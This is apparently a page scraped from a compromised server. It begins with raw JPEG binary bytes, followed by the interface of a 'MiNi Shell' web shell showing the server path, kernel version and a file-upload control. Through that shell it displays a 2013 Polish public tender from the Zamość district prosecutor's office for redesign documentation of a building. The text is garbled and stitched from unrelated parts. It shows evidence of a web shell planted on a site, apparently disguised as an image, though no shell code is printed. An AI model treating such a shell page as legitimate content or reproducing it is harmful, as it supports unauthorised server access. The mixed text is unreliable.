JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/213098-N-2013.html

<p class="kh_header"><b>Zamość: Wykonanie dokumentacji projektowo-kosztorysowej dotyczącej przebudowy budynku przy ul. Orlej 2 w Zamościu i zagospodarowania terenu na potrzeby Prokuratury Okręgowej w Zamościu , z zachowaniem walorów architektonicznych budynku</b><br>
<b>Numer ogłoszenia: 213098 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Zamościu , ul. Szczebrzeska 47, 22-400 Zamość, woj. lubelskie, tel. 084 6396091 do 93, 6396977, faks 084 6393325.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej dotyczącej przebudowy budynku przy ul. Orlej 2 w Zamościu i zagospodarowania terenu na potrzeby Prokuratury Okręgowej w Zamościu , z zachowaniem walorów architektonicznych budynku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Z uwagi na brak dokumentacji dla omawianego budynku  przed fazą projektowania  należy wykonać następujące  czynności:
a) szczegółową inwentaryzację architektoniczno- budowlaną z opisem konstrukcyjnym       budynku,
b)odkrywki celem określenia stanu konstrukcji budynku, stropów, przekroju i posadowienia podłóg drewnianych, izolacji itp.,
c) szczegółową inwentaryzację wykończenia pomieszczeń w zakresie:
1/ lokalizacji podłóg drewnianych z desek, parkietów itp., układ legarów,
2/ lokalizacji posadzek cementowych, terakoty, lastryka itp.,
3/ okładzin ścian; z glazury, boazerii itp.,
4/ malowania olejnego ścian,
5/ okładzin schodów,
6/ ślusarki balustrady,zadaszenia itp.dla potrzeb kosztorysowania robót rozbiórkowych, 
d/szczegółową inwentaryzację instalacji sanitarnych dla potrzeb kosztorysowania robót rozbiórkowych),
e/szczegółową inwentaryzację instalacji centralnego ogrzewania (dla potrzeb    kosztorysowania robót rozbiórkowych,
f/uproszczoną dokumentację elektryczną dla oznaczenia punktów elektrycznych, które będą    demontowane (dla potrzeb kosztorysowania robót rozbiórkowych),
g/ inwentaryzację terenu z oznaczeniem drzewostanu do usunięcia po uzyskaniu       odpowiednich zezwoleń przez zamawiającego) oraz dla potrzeb kosztorysowania,
h/inwentaryzację sieci: wody, kanalizacji sanitarnej i studzienek, sieci gazu, sieci centralnego   ogrzewania dla potrzeb kosztorysowania robót rozbiórkowych,
i/inwentaryzację terenu w zakresie  istniejących chodników, nawierzchni utwardzonych      trwale asfaltowych itp. i tymczasowo żwirowych, żużlowych itp.) (dla potrzeb  kosztorysowania robót rozbiórkowych,
j/ inwentaryzację muru starego ogrodzenia przeznaczonego do całkowitej rozbiórki z    fundamentami dla potrzeb kosztorysowania.
Sporządzona inwentaryzacja na rzutach budynku i mapie terenu będzie podstawą do opracowania projektu budowlanego, w dalszym etapie do kosztorysowania, specyfikacji wykonania i odbioru robót.
2.Koncepcja zagospodarowania pomieszczeń na biura.
a) Piwnice.
Z pomieszczenia węzła cieplnego wydziela się pomieszczenie gospodarcze jak również  planuje się zagospodarowanie miejsca pod schodami. W celu ochrony danych kancelarii tajnej i archiwum - zaprojektowano drzwi bezpieczne usytuowane w korytarzu piwnic
z profili aluminiowych o odporności ogniowej EI 60 min.Pozostałe drzwi w piwnicy o odporności ogniowej EI 30 min.Propozycja podziału pomieszczeń na rysunku rzutu piwnic Zał. Nr  7 do specyfikacji technicznej 
b) Parter.
Dla potrzeb organizacyjnych na biura dokonano podziału pomieszczeń wydzielając z dużych   powierzchni i dzieląc je ścianami murowanymi. W głównym wejściu do budynku zaprojektowano mechaniczny podnośnik dla osób niepełnosprawnych. 
Dla kontroli interesantów zaprojektowano  bramkę pirotechniczną. Pod schodami wydziela się pomieszczenie gospodarcze dla sprzątaczki. Propozycja podziału pomieszczeń na rysunku rzutu parteru Zał. Nr 8 do specyfikacji technicznej   
c) Piętro  I.
Dla potrzeb organizacyjnych na biura dokonano podziału pomieszczeń wydzielając z dużych powierzchni i dzieląc je ścianami murowanymi. W celu uzyskania dodatkowych 
2 pomieszczeń Nr 27 i 34 likwiduje się dwa piony schodów. Planuje się wydzielenie 
z pomieszczenia przeznaczonego na łazienki  pomieszczenia gospodarczego dla sprzątaczki.Propozycja podziału pomieszczeń na rysunku rzutu piętra Zał. Nr  9 do specyfikacji technicznej  .
d)Poddasze.
Sporządzić koncepcję zagospodarowania poddasza na potrzeby pokoi biurowych. Ścianki działowe murowane z bloczków z betonu komórkowego lub płyt panelowych z betonu komórkowego. Stropy podwieszane z płyt gipsowo kartonowych. Na planie koncepcji zaznaczyć piony wszystkich instalacji. Propozycja podziału pomieszczeń na rysunku rzutu poddaszaZałącznik Nr 9a do specyfikacji technicznej
3.Koncepcja zagospodarowania terenu Załączniki Nr Nr 10 i 10a do specyfikacji technicznej.
1)Planuje  się ogrodzenie terenu działki. 
2) Na terenie zaprojektowano garaż o pow. 56 m2 dla 2 samochodów i pomieszczenie     
gospodarcze na podręczny sprzęt. Z części pomieszczenia gospodarczego należy      wydzielić miejsce na pojemniki do selektywnego gromadzenia odpadów. 
3) Przewidziano ok. 25 miejsc postojowych dla samochodów osobowych w tym 1 dla osób niepełnosprawnych.
4) Wjazd na teren posesji i wyjazd  z ul. Orlej , od strony południowej.
5) Wydzielono 5-6 miejsc postojowych dla samochodów osobowych wzdłuż ul. Orlej2, a  propozycję przedstawiono w  Zał. Nr 11 do specyfikacji technicznej.
4.Szczegółowy zakres i opis przedmiotu zamówienia  znajdują się w Załączniku Nr 9 do siwz Specyfikacja techniczna-ogólne założenia do prac  projektowych i kosztorysowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art.22 ust 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wykazu usług  wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie. Wykonawca potwierdzi spełnianie warunków udziału w postępowaniu jeżeli wykaże, że wykonał w opisanym powyżej czasie minimum 1 dokumentację projektową dla obiektu (przeznaczonego na biura) i otoczenia, o zakresie robót podobnym do niniejszego przedmiotu zamówienia i o wartości deklarowanej w  ofercie. Do pozycji z wykazu musi być załączony dokument potwierdzający należyte wykonanie zamówienia (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art.22 ust 1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 
zamawiający uzna, że wykonawca spełnia ten warunek jeżeli wykonawca wykaże ,że dysponuje:
a)minimum 1 osobą posiadającą uprawnienia do projektowania w specjalności architektonicznej oraz
b)minimum 1 osobę  posiadającą uprawnienia do projektowania w specjalności konstrukcyjno -budowlanej oraz
c)minimum 1 osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych , gazowych, wod-kan oraz
d)minimum 1 osobę posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,elektroenergetycznych, specjalisty sieci teleinformatycznych.
Zamawiający uzna warunek za spełniony także wtedy, gdy jedna osoba będzie posiadała kwalifikacje w wielu specjalnościach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art.22 ust 1 ustawy pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie ( w tym: konsorcja , spółki cywilne), w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
W przypadku składania oferty przez spółkę cywilną i nie podpisania jej przez wszystkich wspólników spółki , do oferty należy dołączyć kserokopię umowy spółki cywilnej poświadczonej za zgodność z oryginałem przez wykonawcę , albo pełnomocnictwo do podpisania oferty , o ile z umowy nie wynika pełnomocnictwo do podpisania oferty.
pełnomocnictwa potwierdzające uprawnienia osób podpisujących ofertę wykonawcy do działania w jego imieniu o ile uprawnienia takie nie wynikają z dokumentów rejestrowych. Pełnomocnictwo powinno zostać złożone w formie kserokopii notarialnie poświadczonej za zgodność z oryginałem.
pisemne zobowiązania innego podmiotu/podmiotów lub inny właściwy dokument poświadczający oddanie do dyspozycji wykonawcy niezbędnych zasobów (jakich?) na okres korzystania z nich przy wykonywaniu zamówienia w przypadku gdy wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów. Zobowiązanie powinno zawierać listę osób, które zostaną przez dany podmiot udostępnione lub/i wykaz zasobów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotnymi zmianami umowy są:
1.przedłużenie terminu wykonania prac projektowych. Przedłużenie terminu trwania umowy może nastąpić z następujących przyczyn:
1)wystąpią okoliczności niezależne od wykonawcy, przy zachowaniu przez niego należytej staranności. Okoliczności te będą skutkowały brakiem możliwości dotrzymania terminu umownego,
2)w przypadku konieczności wykonania dokumentacji zamiennej gdy czas na jej wykonanie spowoduje wydłużenie terminu wykonania niniejszej umowy.
2.Zmiana wynagrodzenia. Zmiana wynagrodzenia może wystąpić w wyniku zmiany stawki podatku VAT.
3.Zmiana osób przewidzianych do wykonania umowy. Może ona nastąpić pod warunkiem, że nowe osoby będą miały kwalifikacje nie mniejsze niż osoby wskazane w siwz. Zmiana osoby będzie dopuszczalna w przypadku choroby, wypadku, śmierci lub nienależytego wykonywania obowiązków lub innej niezależnej od wykonawcy przyczyny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamosc.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Zamościu, ul. Szczebrzeska 47,22-400 Zamość, II piętro, pokój 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 09:45, miejsce: Prokuratura Okręgowa w Zamościu, ul. Szczebrzeska 47, 22-400 Zamość, II piętro, pokój nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com